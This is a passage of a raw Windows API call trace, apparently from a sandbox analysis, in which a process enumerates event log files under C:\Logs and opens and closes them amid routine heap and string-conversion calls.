Flags=0x0, Size=0xb0) returned 0x81b40 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81860 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0087.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0087.706] AreFileApisANSI () returned 1 [0087.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0087.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0087.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 91 [0087.706] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.707] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cAlternateFileName="MI7771~1.EVT")) returned 1 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d178 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0087.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0087.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0087.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0087.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.708] AreFileApisANSI () returned 1 [0087.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpUsedDefaultChar=0x0) returned 81 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.708] AreFileApisANSI () returned 1 [0087.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f428 [0087.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 81 [0087.709] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.709] GetFileType (hFile=0x424) returned 0x1 [0087.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0087.709] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.709] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.709] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.709] CloseHandle (hObject=0x424) returned 1 [0087.710] AreFileApisANSI () returned 1 [0087.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f848 [0087.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5f848, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 81 [0087.710] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.710] GetFileType (hFile=0x424) returned 0x1 [0087.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0087.710] CloseHandle (hObject=0x424) returned 1 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0087.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d2c8 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d178 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0087.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cc38 [0087.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0087.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cc38 | out: hHeap=0x20000) returned 1 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d178 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0087.711] AreFileApisANSI () returned 1 [0087.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f798 [0087.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 81 [0087.711] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.711] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cAlternateFileName="MI4667~1.EVT")) returned 1 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0087.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0087.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0087.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0087.712] AreFileApisANSI () returned 1 [0087.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpUsedDefaultChar=0x0) returned 66 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0087.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.713] AreFileApisANSI () returned 1 [0087.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82b98 [0087.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x82b98, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 66 [0087.713] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.713] GetFileType (hFile=0x424) returned 0x1 [0087.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b98 | out: hHeap=0x20000) returned 1 [0087.713] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.713] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.713] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.713] CloseHandle (hObject=0x424) returned 1 [0087.714] AreFileApisANSI () returned 1 [0087.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x828c8 [0087.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x828c8, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 66 [0087.714] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.714] GetFileType (hFile=0x424) returned 0x1 [0087.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x828c8 | out: hHeap=0x20000) returned 1 [0087.714] CloseHandle (hObject=0x424) returned 1 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0087.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0087.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0087.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0087.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0087.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0087.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0087.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 